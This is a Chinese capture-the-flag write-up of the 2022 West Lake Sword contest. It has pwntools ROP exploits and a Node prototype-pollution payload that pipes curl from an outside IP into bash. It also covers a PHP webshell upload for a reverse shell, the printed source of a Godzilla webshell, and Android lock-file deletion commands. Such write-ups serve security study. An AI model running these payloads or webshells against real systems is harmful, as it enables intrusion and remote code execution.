Part1排名 和 解题一览
Pwn:babycalc,Message Board
Web:real_ez_node,扭转乾坤,unusual php,Node Magical
Reverse: BabyRE
Misc:签到题,mp3,机你太美,take_the_zip_easy
Part2PWN
1babycalc
angr先跑个key出来
利用溢出控制i然后修改返回地址,因为没有覆盖rbp所以将返回地址改成leave ret,一定概率上可以让程序执行流返回到输入的某个位置,在缓冲区内布置泄露libc、读新rop链到bss段上、修改rbp和leave ret的rop链即可。
from pwn import *
from ctypes import *
import struct
#context.log_level = 'debug'
#io=process(["./qemu-arm-static", "-g", "1234", "-L", '/usr/arm-linux-gnueabi', "./pwn"])
#io=process(["qemu-arm", "-L", '/usr/arm-linux-gnueabi', "./pwn"])
#io = process('./pwn')
#io=gdb.debug('./pwn','b*0x4013ba')
context.arch='amd64'
elf=ELF('./pwn')
#io = remote('tcp.cloud.dasctf.com', 21963)
libc = ELF('./libc-2.23.so')
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
sn = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
irt = lambda : io.interactive()
dbg = lambda text=None : gdb.attach(io, text)
# lg = lambda s,addr : log.info('�33[1;31;40m %s --> 0x%x �33[0m' % (s,addr))
lg = lambda s : log.info('�33[1;31;40m %s --> 0x%x �33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))
rbp_ret=0x00000000004006b0
def csu(text,edi, rsi, rdx, rip):
payload = b""
payload += p64(0x400c40+ 90)
payload += p64(0) # rbx
payload += p64(1) #rbp
payload += p64(rip) #r12
payload += p64(rdx) #r13
payload += p64(rsi) #r14
payload += p64(edi) #r15
payload += p64(0x400c40 + 64)
payload += p64(0)*7
return payload
leave_ret=0x0000000000400bb7
bss=0x602500
ret=0x00000000004005b9
while True:
#io = process('./pwn')
#gdb.attach(io,'b*0x400bb7')
io = remote('tcp.cloud.dasctf.com', 21963)
key=b'x13$5F7Bx11xa12x83xd4evxc7x18x03'
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
rdi_ret=0x0000000000400ca3
rop_chain=p64(rdi_ret)+p64(puts_got)+p64(puts_plt)+csu(0,0,bss+8,0x50,elf.got['read'])+p64(rbp_ret)+p64(bss)+p64(leave_ret)
payload=(str(0x18)+'x00').ljust(0x28,'a')+rop_chain
payload=payload.ljust(0xd0,'x00')+key
payload=payload.ljust(0xf8,'x00')+p32(0x38)*2
sa("number",payload)
ru("good donen")
try:
libcbase=u64(io.recv(6).ljust(8,'x00'))-libc.sym['puts']
lg("libcbase")
#gdb.attach(io,'b*0x0000000000400ca3')
system=libcbase+libc.sym['system']
binsh=libcbase+libc.search('/bin/shx00').next()
payload=p64(rdi_ret)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)
irt()
except:
io.close()
2Message Board
泄露栈地址后栈迁移,orw
from pwn import *
#p = process('./pwn')
p=remote('tcp.cloud.dasctf.com',27941)
libc=ELF('./libc.so.6')
context.log_level = 'debug'
context.arch = 'amd64'
r = lambda x: p.recv(x)
ra = lambda: p.recvall()
rl = lambda: p.recvline(keepends=True)
ru = lambda x: p.recvuntil(x, drop=True)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
ia = lambda: p.interactive()
c = lambda: p.close()
li = lambda x: log.info(x)
db = lambda: gdb.attach(p)
#gdb.attach(p,'b* 0x4013A2')
leaveret=0x4013A2
sla('name:','%p%31$p')
ru('Hello, 0x')
stack=int(p.recv(12),16)
info('stack->'+hex(stack))
ru('0x')
libcbase=int(p.recv(12),16)-0x24083
info('libc->'+hex(libcbase))
poprdi=libcbase+libc.search(asm("pop rdi;ret")).next()
poprsi=libcbase+libc.search(asm("pop rsi;ret")).next()
poprax=libcbase+libc.search(asm("pop rax;ret")).next()
poprdx=libcbase+libc.search(asm("pop rdx;ret")).next()
syscall=libcbase+libc.search(asm("syscall;ret")).next()
open=libcbase+libc.sym['open']
poprdx=libcbase+0x0000000000142c92
write=libcbase+libc.sym['write']
read=libcbase+libc.sym['read']
payload='a'*8+p64(poprdi)+p64(stack+0x90)+p64(poprsi)+p64(0)+p64(open)
payload+=p64(poprdi)+p64(3)+p64(poprsi)+p64(stack)+p64(poprdx)+p64(0x50)+p64(read)+p64(poprdi)+p64(1)+p64(write)+'flagx00x00x00x00'
sla('DASCTF:',payload.ljust(0xb0,'x00')+p64(stack+0x10)+p64(leaveret))
p.interactive()
Part3WEB
3real_ez_node
py脚本:
import requests
import urllib.parse
payload = ''' HTTP/1.1
POST /copy HTTP/1.1
Host: 3000.endpoint-ad87bdfd965445549ec2213aaed2ee11.m.ins.cloud.dasctf.com:81
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
constructor.prototype.outputFunctionName=a%3D1%3B%20return%20global.process.mainModule.constructor._load('child_process').execSync('curl 120.48.91.102:7777 | bash')%3B%20%2F%2F
GET / HTTP/1.1
test:'''.replace("n", "rn")
def payload_encode(raw):
ret = u""
for i in raw:
ret += chr(0x0100 + ord(i))
return ret
payload_end = payload_encode(payload)
print(payload_end)
r = requests.get('http://3000.endpoint-ad87bdfd965445549ec2213aaed2ee11.m.ins.cloud.dasctf.com:81/curl?q=' + urllib.parse.quote(payload_end))
print(r.text)
加密和脚本参考链接:[GYCTF2020]Node Game
https://blog.csdn.net/weixin_46081055/article/details/119982707
4扭转乾坤
大小写绕过 Content-Type
5unusual php
code:
<?php
if($_GET["a"]=="upload"){
move_uploaded_file($_FILES['file']["tmp_name"], "upload/".$_FILES['file']["name"]);
}elseif ($_GET["a"]=="read") {
echo file_get_contents($_GET["file"]);
}elseif ($_GET["a"]=="version") {
phpinfo();
}
Phpinfo:
extension_dir
/usr/local/lib/php/extensions/no-debug-non-zts-20190902
/usr/local/lib/php/extensions/no-debug-non-zts-20190902
插件名:zend-test 所以读zend_test.so
?a=read&file=php://filter/read=convert.base64-encode/resource=/usr/local/lib/php/extensions/no-debug-non-zts-20190902/zend_test.so
逆向可以得知其对编译过程中使用RC4来加密 然后秘钥是abcsdfadfjiweur
先用RC4加密一句话木马,然后用BASE64加密一下。
最后利用Python脚本文件上传
import base64
import requests
url = 'http://80.endpoint-f532dd899a95423a9da93c320d96203f.m.ins.cloud.dasctf.com:81/?a=upload'
#st = "473xeG4wtlxIPuzM0Zi46bl2MAt6rc4g/puO1N6uKMor9D6bGuJ0E+OGMIpQcIHoJyPV/W7zr5MNMEDUDkCslc2fgzkOTgFGjjeSbzmMBZpdY7MhAtH6tQRCb3TzGMHZY1dnGPCovFrL5NT9Wse7ILNwkN1sEk51koKOXcIcAlmFhd3bSL8R5+5irXmbEH1SdiyPdQr5L9DBGMBGCYUwY6qsOcn9RE0b1p+/LcVxji+/PKrmCG52YnFTJfezjzi681DqjQUq9RrN3w9IQV8tkfVzzV7UrN4TfDSHZDHeofjBMNs/Cn0e8lnga6Kw5nOuO2BKkByRyWvjrzT1sMGavQuxPMcNkNqklOhc+JqRn9gDGLmWp7hHwcBj8xoes1SSyY/t/RPrmK/wOqmfONvjVpy73UIQ1g=="
st = "473xeG4dyE1SLeHNkNuP2qNEAkB86Igo1dPH"
files = {'file': ("2.php",base64.b64decode(st) )}
response = requests.post(url, files=files)
json = response.text
print(json)
然后访问upload/2.php反弹shell
随后提权就行了
6Node Magical
在flag1路由下首先设置cookie字段为user=admin,就可以得到第一段flag
然后在flag2路由下抓包,修改json,利用数组引发toLowerCase函数报错,注意的是数组中的值要有16个,然后可以拿到前面一段flag。
Part4REVERSE
7BabyRE
先base8 确定了第7位到第42位,直接解即可 得915572239428449843076691286116796614
再是一个魔改过的sha1
爆破得到前6位 561516
然后再以输入的43到48作为rc4的key进行加密
爆破key
cmp = b'?x95xbbxf2Wxf1zZ"aQCxa2xfax9boDcxc0x08x12e\x8ax8cLxed^xcavxb9x85xafx058xedB>Bxdf]xbex05x8b5mxf3x1cxcfxf8js%xe4xb7xb96xfbx02x11xa0xf0Wxab!xc6xc7Fx99xbdx1ea^xeeUx18xeex03)x84x7fx94_xb4j)xd8lxe4xc0x9dkxccxd5x94\xddxccxd5=xc0xefx0c)xe5xb0x93xf1xb3xdexb0p'
from Crypto.Cipher import ARC4
t1 = b'1523306115230466162304651523346214431471150310701503207116032063140334661543446114434066142304661563446615430464'
for data in tqdm(product('0123456789',repeat=6)):
key = ''.join(data)
rc4 = ARC4.new(key.encode())
res = rc4.encrypt(t1)
# print(res)
if res == cmp:
print("found " ,key)
得到最后6位 807391
Part5Misc:
8签到题喵:
看jpg文件尾部有一些内容 感觉是换编码 View->Character Set->UTF-8
欢迎~DASCTF{W3lc0m3_t0_GCSIS_2023}~只需要提交括号内的字符串即可
9mp3:
MP3Stego 空密码 拿到数据
8750d5109208213f
foremost分离出一张图片
黑白是10,用脚本提取
from PIL import Image
import requests
import threading
def getPngPix(pngPath = "aa.png",pixelX = 1,pixelY = 1):
img_src = Image.open(pngPath)
img_src = img_src.convert('RGBA')
str_strlist = img_src.load()
data = str_strlist[pixelX,pixelY]
img_src.close()
return data
img=Image.open("00000646.png")
print(img.width)
print(img.height)
for i in range (0,53):
for j in range(64):
a = getPngPix("00000646.png",j,i)
if a[1]==255:
print(1,end="")
if a[1]== 0 :
print(0,end="")
print()
结果
0101000001001011000000110000010000010100000000000000000100000000
0000100000000000100110000100110110011001010101000000111011000011
0100010000101110000101100000000100000000000000001000011100000011
0000000000000000000001100000000000000000000000000011010000110111
0010111001110100011110000111010010010001100001110011111011111111
1011111010101100111000010101000010101100001011000011101101010010
1010100101111110110000101000010110000000010010000100110011000000
1101011101010110010111100110011100010000100011111000110011010000
1111011101000011001010001010111110011001111010001001100111011110
0000111110101101111100100010000011010010111101001010100001001101
0010010001110101100000111111111011001111001000100100100011011000
0001011111011010100111011001011011101000000111101110111000001110
0101000101011000100000001100010100011010101000010100110011010011
1000011001001001010010010010001001011110011110100011110100011010
1100000100000101011100011001001111100010010101110100101011001010
1001001110110011100101010000001011101001100110011111100010001110
1110100110010100001110011001101010001110011111001101101111011000
0111010011011101101110110000011111010110011110111000001010101111
0011000101000010011011110110110111111001001111001010010100010001
1111000010001101000110001111100111100110001011010001101110101100
0000110110010000100111010001000010001001110100000010011011001111
1000010110010100110111010100010100001011001111111011011000011111
0000010011000101011111001000111000010111100011100101011001110001
0001001111100000000101101000010101000010100100101000110001101110
1101001111100100011000111101101100100110100111001111111001010001
1100001000101110010001000001000110011001000101100010011010100100
0000110101011111100010000000100111001010001111111011001110101001
1001101001111010110010010000100101000001100011010101011111100001
1110010100111110011101110110011001101111111000001011000001001010
0111000111001111000001110001010111111110000110111100011100110100
1010011100010110110101110111001000100011110100001101110010100110
1110111011001011011100100111000001111100010101111011010000001010
0111100011100010110000010101110110100000010111001100000011000101
0011110000011110001011011101100010011101110101000001001101000110
1111100001101011000011001111111101101011000001111101100011001110
0001111111101100111100111001110010011110011110111001111101010010
1100100010010110000010000000110101001010011100011100100001000100
1011101101101110000101111101010001101000111001110000101111000100
1001000101101000101011010101110001111100110110011100110111101010
1000111000001101010100000100101100000001000000100011111100000000
0001010000000000000000010000000000001000000000001001100001001101
1001100101010100000011101100001101000100001011100001011000000001
0000000000000000100001110000001100000000000000000000011000000000
0010010000000000000000000000000000000000000000000000000000000000
0010000000000000000000000000000000000000000000000000000000000000
0011010000110111001011100111010001111000011101000000101000000000
0010000000000000000000000000000000000000000000000000000100000000
0001100000000000001100111011011101010110000010110100011001011000
1101100000000001001100111011011101010110000010110100011001011000
1101100000000001110010110101010010111011010110000100010001011000
1101100000000001010100000100101100000101000001100000000000000000
0000000000000000000000010000000000000001000000000101100000000000
0000000000000000001110100000000100000000000000000000000000000000
frombinary后拿到压缩包 输入上文get到的密码8750d5109208213f解压拿到47.txt
2lO,.j2lL000iZZ2[2222iWP,.ZQQX,2.[002iZZ2[2020iWP,.ZQQX,2.[020iZZ2[2022iWLNZQQX,2.[2202iW2,2.ZQQX,2.[022iZZ2[2220iWPQQZQQX,2.[200iZZ2[202iZZ2[2200iWLNZQQX,2.[220iZZ2[222iZZ2[2000iZZ2[2002iZZ2Nj2]20lW2]20l2ZQQX,2]202.ZW2]02l2]20,2]002.XZW2]22lW2]2ZQQX,2]002.XZWWP2XZQQX,2]022.ZW2]00l2]20,2]220.XZW2]2lWPQQZQQX,2]002.XZW2]0lWPQQZQQX,2]020.XZ2]20,2]202.Z2]00Z2]02Z2]2j2]22l2]2ZWPQQZQQX,2]022.Z2]00Z2]0Z2]2Z2]22j2]2lW2]000X,2]20.,2]20.j2]2W2]2W2]22ZQ-QQZ2]2020ZWP,.ZQQX,2]020.Z2]2220ZQ--QZ2]002Z2]220Z2]020Z2]00ZQW---Q--QZ2]002Z2]000Z2]200ZQ--QZ2]002Z2]000Z2]002ZQ--QZ2]002Z2]020Z2]022ZQ--QZ2]002Z2]000Z2]022ZQ--QZ2]002Z2]020Z2]200ZQ--QZ2]002Z2]000Z2]220ZQLQZ2]2222Z2]2000Z2]000Z2]2002Z2]222Z2]020Z2]202Z2]222Z2]2202Z2]220Z2]2002Z2]2002Z2]2202Z2]222Z2]2222Z2]2202Z2]2022Z2]2020Z2]222Z2]2220Z2]2002Z2]222Z2]2020Z2]002Z2]202Z2]2200Z2]200Z2]2222Z2]2002Z2]200Z2]2022Z2]200ZQN---Q--QZ2]200Z2]000ZQXjQZQ-QQXWXXWXj
由于文件名是47 所以能想到rot47,rot47解码
a=~[];a={___:++a,aaaa:(![]+"")[a],__a:++a,a_a_:(![]+"")[a],_a_:++a,a_aa:({}+"")[a],aa_a:(a[a]+"")[a],_aa:++a,aaa_:(!""+"")[a],a__:++a,a_a:++a,aa__:({}+"")[a],aa_:++a,aaa:++a,a___:++a,a__a:++a};a.a_=(a.a_=a+"")[a.a_a]+(a._a=a.a_[a.__a])+(a.aa=(a.a+"")[a.__a])+((!a)+"")[a._aa]+(a.__=a.a_[a.aa_])+(a.a=(!""+"")[a.__a])+(a._=(!""+"")[a._a_])+a.a_[a.a_a]+a.__+a._a+a.a;a.aa=a.a+(!""+"")[a._aa]+a.__+a._+a.a+a.aa;a.a=(a.___)[a.a_][a.a_];a.a(a.a(a.aa+"""+a.a_a_+(![]+"")[a._a_]+a.aaa_+"\"+a.__a+a.aa_+a._a_+a.__+"(\"\"+a.__a+a.___+a.a__+"\"+a.__a+a.___+a.__a+"\"+a.__a+a._a_+a._aa+"\"+a.__a+a.___+a._aa+"\"+a.__a+a._a_+a.a__+"\"+a.__a+a.___+a.aa_+"{"+a.aaaa+a.a___+a.___+a.a__a+a.aaa+a._a_+a.a_a+a.aaa+a.aa_a+a.aa_+a.a__a+a.a__a+a.aa_a+a.aaa+a.aaaa+a.aa_a+a.a_aa+a.a_a_+a.aaa+a.aaa_+a.a__a+a.aaa+a.a_a_+a.__a+a.a_a+a.aa__+a.a__+a.aaaa+a.a__a+a.a__+a.a_aa+a.a__+"}\"\"+a.a__+a.___+");"+""")())();
直接浏览器运行拿到flag
DASCTF{f8097257d699d7fdba7e97a15c4f94b4}
10机你太美:
下载发现是npbk文件 –> 使用夜神模拟器导入然后分析
需要解决的第一个问题是如何进入锁屏
搜索可以得知可以删除一些文件以及通过第一个hint:adbshell得知可以使用adb shell来完成这项工作 参考–> http://www.360doc.com/content/12/0121/07/37846289_1012985425.shtml
rm /data/system/locksettings.db
rm /data/system/locksettings.db-shm
rm /data/system/locksettings.db-wal
rm /data/system/gatekeeper.password.key
rm /data/system/gatekeeper.pattern.key
重启后进入系统,然后可以观察到一款加密聊天软件Skred 可以通过其中观察到一些聊天信息
聊天信息:
可以看到其搞了一堆压缩包和两张图.下一步的目标我们可以通过adb pull对其进行提取/data/data/mobi.skred.app/files/conversations/9f817126-eabd-4c5c-9b47-bebe04545ba0
d2q:/data/data/mobi.skred.app/files/conversations/9f817126-eabd-4c5c-9b47-bebe04545ba0 # ls
19.zip 21.zip 23.zip 25.zip 27.zip 29.zip 31.zip 41.png 75.jpg
20.zip 22.zip 24.zip 26.zip 28.zip 30.zip 32.zip 50.zip
d2q:/data/data/mobi.skred.app/files/conversations/9f817126-eabd-4c5c-9b47-bebe04545ba0 #
提取后可以得到这些文件
然后主要是png和jpg文件
41.png的通道alpha 2存在数据
由于其图像是RGBA 可通过img.mode探测得到.可以通过选取其像素的第四,透明度来进行脚本的提取
统计了一下我们发现其存在大量的Alpha值为255比较符合上文中的白也就是透明
from PIL import Image
img=Image.open("41.png")
print(img.mode) #RGBA
print(img.width)
print(img.height)
for m in range(img.width):
for n in range(img.height):
pxl = img.getpixel((m,n))
print(pxl)
透明代表1,其他的即为不透明也就是上文的黑 代表0 写出脚本即可将上面图片的那些黑点以二进制形式提取出来
from PIL import Image
img=Image.open("41.png")
print(img.mode) #RGBA
print(img.width)
print(img.height)
for m in range(img.width):
for n in range(img.height):
pxl = img.getpixel((m,n))
if(pxl[3] == 255):
print(1,end='')
else:
print(0,end='')
0110010100110000001100010011010100110100001101000110000100111001001100110011001100110011011001010110011000110110001100100110000100110011011000010110000100110010001101110011001100110101001101110110010101100010001101010011001001100101011000010011100001100001
From binary可以得到
e01544a9333ef62a3aa27357eb52ea8a
然后可以通过这个密码解开50.zip的压缩包
得到flag 但是还是乱码的状态 检索第二张图
75.jpg的Exif信息存在comment
ExifTool Version Number : 11.88
File Name : 75.jpg
Directory : .
File Size : 2.4 MB
File Modification Date/Time : 2023:02:02 00:24:03-08:00
File Access Date/Time : 2023:02:02 02:54:43-08:00
File Inode Change Date/Time : 2023:02:02 02:54:43-08:00
File Permissions : rw-------
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
Orientation : Horizontal (normal)
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Y Cb Cr Positioning : Co-sited
Exposure Time : 1/250
F Number : 4.0
Exposure Program : Aperture-priority AE
ISO : 200
Exif Version : 0221
Components Configuration : Y, Cb, Cr, -
Shutter Speed Value : 1/250
Aperture Value : 4.0
Exposure Compensation : 0
Metering Mode : Multi-segment
Flash : Off, Did not fire
Focal Length : 50.0 mm
User Comment : XOR DASCTF2022
Sub Sec Time : 39
Sub Sec Time Original : 39
Sub Sec Time Digitized : 39
Flashpix Version : 0100
Color Space : sRGB
Exif Image Width : 3888
Exif Image Height : 2592
Interoperability Index : R98 - DCF basic file (sRGB)
Interoperability Version : 0100
Focal Plane X Resolution : 4438.356164
Focal Plane Y Resolution : 4445.969125
Focal Plane Resolution Unit : inches
Custom Rendered : Normal
Exposure Mode : Auto
White Balance : Auto
Scene Capture Type : Standard
Compression : JPEG (old-style)
Thumbnail Offset : 8412
Thumbnail Length : 19629
Image Width : 3888
Image Height : 2592
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:2 (2 1)
Aperture : 4.0
Image Size : 3888x2592
Megapixels : 10.1
Scale Factor To 35 mm Equivalent: 1.6
Shutter Speed : 1/250
Thumbnail Image : (Binary data 19629 bytes, use -b option to extract)
Circle Of Confusion : 0.019 mm
Field Of View : 25.1 deg
Focal Length : 50.0 mm (35 mm equivalent: 80.9 mm)
Hyperfocal Distance : 33.67 m
Light Value : 11.0
可以看到User Comment : XOR DASCTF2022
将乱码的flagxorDASCTF2022即得flag
DASCTF{fe089fecf73daa9dcba9bc385df54605}
11take_the_zip_easy
https://github.com/kimci86/bkcrack
bkcrack明文攻击 key为 2b7d78f3 0ebcabad a069728c
然后提取出dasflow.zip
解压后打开流量包,发现存在flag.zip,提取出来后发现需要密码
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='air123';
$payloadName='payload';
$key='d8ea7326e6ec5916';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
------WebKitFormBoundaryYfuJPXz4uXR4mXZI
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundaryYfuJPXz4uXR4mXZI--
https://blog.csdn.net/u011250160/article/details/120501033?ops_request_misc=&request_id=&biz_id=102&utm_term=%E5%93%A5%E6%96%AF%E6%8B%89%E6%B5%81%E9%87%8F%E8%A7%A3%E5%AF%86&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-2-120501033.nonecase&spm=1018.2226.3001.4187
哥斯拉流量解密,找一个解密脚本,然后改过来运行一下
<?php
function encode($D,$K){
for($i=0;$i<strlen($D);$i++){
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='air123';
$payloadName='payload';
$key='d8ea7326e6ec5916';
echo gzdecode(encode(base64_decode('J+5pNzMyNmU2mij7dMD/qHMAa1dTUh6rZrUuY2l7eDVot058H+AZShmyrB3w/OdLFa2oeH/jYdeYr09l6fxhLPMsLeAwg8MkGmC+Nbz1+kYvogF0EFH1p/KFEzIcNBVfDaa946G+ynGJob9hH1+WlZFwyP79y4/cvxxKNVw8xP1OZWE3'),$key));
?>
解密得到
然后用airDAS1231qaSW@解压缩包,得到
DASCTF{7892a81d23580e4f3073494db431afc5}
Part6附件下载:
https://github.com/Randark-JMT/CTF_Archive/releases/tag/2022-xhlj
https://github.com/CTF-Archives
原文始发于微信公众号(笨猪实验室):2022西湖论剑 网络安全大赛 wp by F61d
